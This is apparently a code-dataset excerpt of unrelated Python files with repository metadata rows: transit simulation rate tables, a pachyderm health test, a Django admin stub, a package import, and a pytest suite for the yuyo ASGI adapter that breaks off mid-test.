(4.651634942455243, 9.4223325, 7.0762173188405795, 3.84940385620915, 2.2025951773049646, 0.0, 5.849107442112278, 8.810380709219858, 5.774105784313726, 4.717478212560386, 2.355583125, 0.0), # 52
(4.658334007352941, 9.428950880681818, 7.055450208333333, 3.8463060702614382, 2.1978514982269504, 0.0, 5.794830651340996, 8.791405992907801, 5.769459105392158, 4.703633472222222, 2.3572377201704544, 0.0), # 53
(4.6649056265984665, 9.435414545454544, 7.034059565217391, 3.843098823529412, 2.192945106382979, 0.0, 5.739350374812594, 8.771780425531915, 5.764648235294119, 4.689373043478261, 2.358853636363636, 0.0), # 54
(4.671354499680307, 9.441722301136364, 7.012070878623187, 3.8397845179738566, 2.1878800975177306, 0.0, 5.682753675245711, 8.751520390070922, 5.759676776960785, 4.674713919082125, 2.360430575284091, 0.0), # 55
(4.677685326086957, 9.447872954545453, 6.989509637681159, 3.8363655555555556, 2.1826605673758865, 0.0, 5.625127615358988, 8.730642269503546, 5.754548333333334, 4.65967309178744, 2.361968238636363, 0.0), # 56
(4.683902805306906, 9.453865312500001, 6.966401331521738, 3.832844338235294, 2.1772906117021273, 0.0, 5.566559257871065, 8.70916244680851, 5.749266507352941, 4.644267554347826, 2.3634663281250003, 0.0), # 57
(4.690011636828645, 9.459698181818181, 6.942771449275362, 3.8292232679738563, 2.1717743262411346, 0.0, 5.507135665500583, 8.687097304964539, 5.743834901960785, 4.628514299516908, 2.3649245454545453, 0.0), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_allighting_rate = (
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 0
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 1
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 2
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 3
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 4
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 5
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 6
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 7
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 8
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 9
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 10
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 11
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 12
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 13
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 14
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 15
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 16
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 17
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 18
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 19
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 20
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 21
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 22
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 23
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 24
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 25
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 26
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 27
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 28
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 29
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 30
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 31
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 32
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 33
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 34
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 35
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 36
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 37
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 38
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 39
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 40
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 41
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 42
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 43
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 44
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 45
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 46
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 47
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 48
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 49
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 50
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 51
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 52
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 53
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 54
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 55
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 56
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 57
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 58
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 59
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 258194110137029475889902652135037600173
#index for seed sequence child
child_seed_index = (
1, # 0
2, # 1
)
| 113.104478 | 212 | 0.729111 | 5,147 | 37,890 | 5.365261 | 0.22926 | 0.312873 | 0.247691 | 0.46931 | 0.329133 | 0.327865 | 0.327865 | 0.327865 | 0.327865 | 0.327865 | 0 | 0.819032 | 0.119134 | 37,890 | 334 | 213 | 113.443114 | 0.008359 | 0.031961 | 0 | 0.202532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.015823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
107cb9b42985f4684a3f93ee760d0e5abaf70cbd | 154 | py | Python | tests/health.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 57 | 2018-02-25T16:23:47.000Z | 2022-02-08T08:48:12.000Z | tests/health.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 209 | 2018-02-16T14:31:25.000Z | 2022-03-15T15:24:19.000Z | tests/health.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 23 | 2018-02-16T15:31:46.000Z | 2022-03-09T20:41:31.000Z | #!/usr/bin/env python
"""Tests for health-related functionality."""
import python_pachyderm
def test_health():
python_pachyderm.Client().health()
| 15.4 | 45 | 0.733766 | 19 | 154 | 5.789474 | 0.736842 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123377 | 154 | 9 | 46 | 17.111111 | 0.814815 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
52a3e391dd8e87dd78ddac91a51a90a58c191863 | 162 | py | Python | home/admin.py | mamad-azimi-jozani/charity_django_blog | ef13f8c74e2050cb478f44b719ef33d122435763 | [
"MIT"
] | null | null | null | home/admin.py | mamad-azimi-jozani/charity_django_blog | ef13f8c74e2050cb478f44b719ef33d122435763 | [
"MIT"
] | null | null | null | home/admin.py | mamad-azimi-jozani/charity_django_blog | ef13f8c74e2050cb478f44b719ef33d122435763 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Contact
# Register your models here.
@admin.register(Contact)
class AdminContact(admin.ModelAdmin):
pass
| 23.142857 | 37 | 0.796296 | 21 | 162 | 6.142857 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12963 | 162 | 6 | 38 | 27 | 0.914894 | 0.160494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
5e32f82dc636abc327579dc94d95b313b9f4aa67 | 36 | py | Python | services/projects/api/v1/__init__.py | amthorn/qutex | 2bc441e63cba38d80aa9438b6278b732d44849a4 | [
"MIT"
] | null | null | null | services/projects/api/v1/__init__.py | amthorn/qutex | 2bc441e63cba38d80aa9438b6278b732d44849a4 | [
"MIT"
] | 239 | 2021-05-12T03:54:32.000Z | 2022-03-31T06:15:52.000Z | services/projects/api/v1/__init__.py | amthorn/qutex | 2bc441e63cba38d80aa9438b6278b732d44849a4 | [
"MIT"
] | 2 | 2022-02-17T23:13:12.000Z | 2022-03-02T20:28:41.000Z | from api.v1 import projects # noqa
| 18 | 35 | 0.75 | 6 | 36 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.194444 | 36 | 1 | 36 | 36 | 0.896552 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d80056635d76d3d50df3dfc07b198ed59994e648 | 26,962 | py | Python | tests/test_asgi.py | FasterSpeeding/Yuyo | 84265c9b7660ee457be013bb95789e4063cedad3 | [
"BSD-3-Clause"
] | 9 | 2021-08-21T15:23:55.000Z | 2022-03-22T03:23:40.000Z | tests/test_asgi.py | FasterSpeeding/Yuyo | 84265c9b7660ee457be013bb95789e4063cedad3 | [
"BSD-3-Clause"
] | 14 | 2021-01-17T10:25:09.000Z | 2022-03-02T09:33:50.000Z | tests/test_asgi.py | FasterSpeeding/Yuyo | 84265c9b7660ee457be013bb95789e4063cedad3 | [
"BSD-3-Clause"
] | 3 | 2021-09-23T22:43:50.000Z | 2022-02-15T23:34:23.000Z | # -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2021, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import traceback
from unittest import mock
import asgiref.typing
import hikari
import pytest
import yuyo
class TestAsgiAdapter:
@pytest.fixture()
def stub_server(self) -> hikari.api.InteractionServer:
return mock.AsyncMock()
@pytest.fixture()
def adapter(self, stub_server: hikari.api.InteractionServer) -> yuyo.AsgiAdapter:
return yuyo.AsgiAdapter(stub_server)
def test_server_property(self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer) -> None:
assert adapter.server is stub_server
@pytest.fixture()
def http_scope(self) -> asgiref.typing.HTTPScope:
return asgiref.typing.HTTPScope(
type="http",
asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0"),
http_version="1.1",
method="POST",
scheme="",
path="/",
raw_path=b"",
headers=[],
client=("", 1),
server=("", 1),
extensions=None,
query_string=b"",
root_path="",
)
@pytest.mark.asyncio()
async def test___call___when_http(
self, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
) -> None:
mock_process_request = mock.AsyncMock()
mock_receive = mock.Mock()
mock_send = mock.Mock()
class StubAdapter(yuyo.AsgiAdapter):
process_request = mock_process_request
stub_adapter = StubAdapter(stub_server)
await stub_adapter(http_scope, mock_receive, mock_send)
mock_process_request.assert_awaited_once_with(http_scope, mock_receive, mock_send)
@pytest.mark.asyncio()
async def test___call___when_lifespan(self, stub_server: hikari.api.InteractionServer):
mock_process_lifespan_event = mock.AsyncMock()
mock_receive = mock.Mock()
mock_send = mock.Mock()
mock_scope = asgiref.typing.LifespanScope(
type="lifespan", asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0")
)
class StubAdapter(yuyo.AsgiAdapter):
process_lifespan_event = mock_process_lifespan_event
stub_adapter = StubAdapter(stub_server)
await stub_adapter(mock_scope, mock_receive, mock_send)
mock_process_lifespan_event.assert_awaited_once_with(mock_receive, mock_send)
@pytest.mark.asyncio()
async def test___call___when_webhook(self, adapter: yuyo.AsgiAdapter):
with pytest.raises(NotImplementedError, match="Websocket operations are not supported"):
await adapter(
asgiref.typing.WebSocketScope(
type="websocket",
asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0"),
http_version="...",
scheme="...",
path="/",
raw_path=b"",
query_string=b"",
root_path="",
headers=[],
client=("2", 2),
server=None,
subprotocols=[],
extensions={},
),
mock.AsyncMock(),
mock.AsyncMock(),
)
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_with_callbacks(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock()
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_when_sync_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock(side_effect=Exception("test"))
mock_callback = mock.Mock()
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_when_async_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock(side_effect=Exception("test"))
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_with_callbacks(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock()
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_when_sync_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock(side_effect=Exception("test"))
mock_callback = mock.Mock()
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_when_async_callback_fails(
self, adapter: yuyo.AsgiAdapter
) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock(side_effect=Exception("test"))
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_invalid_lifespan_type(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.idk"})
mock_send = mock.AsyncMock()
with pytest.raises(RuntimeError, match="Unknown lifespan event lifespan.idk"):
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [
(b"Content-Type", b"application/json"),
(b"x-signature-timestamp", b"321123"),
(b"random-header2", b"random value"),
(b"x-signature-ed25519", b"6e796161"),
(b"random-header", b"random value"),
]
mock_receive = mock.AsyncMock(
side_effect=[{"body": b"cat", "more_body": True}, {"body": b"girls", "more_body": False}]
)
mock_send = mock.AsyncMock()
stub_server.on_interaction.return_value.headers = {
"Content-Type": "jazz hands",
"kill": "me baby",
"I am the milk man": "my milk is delicious",
"and the sea shall run white": "with his rage",
}
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": stub_server.on_interaction.return_value.status_code,
"headers": [
(b"Content-Type", b"jazz hands"),
(b"kill", b"me baby"),
(b"I am the milk man", b"my milk is delicious"),
(b"and the sea shall run white", b"with his rage"),
],
}
),
mock.call(
{
"type": "http.response.body",
"body": stub_server.on_interaction.return_value.payload,
"more_body": False,
}
),
]
)
mock_receive.assert_has_awaits([mock.call(), mock.call()])
stub_server.on_interaction.assert_awaited_once_with(bytearray(b"catgirls"), b"nyaa", b"321123")
@pytest.mark.asyncio()
async def test_process_request_when_not_post(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["method"] = "GET"
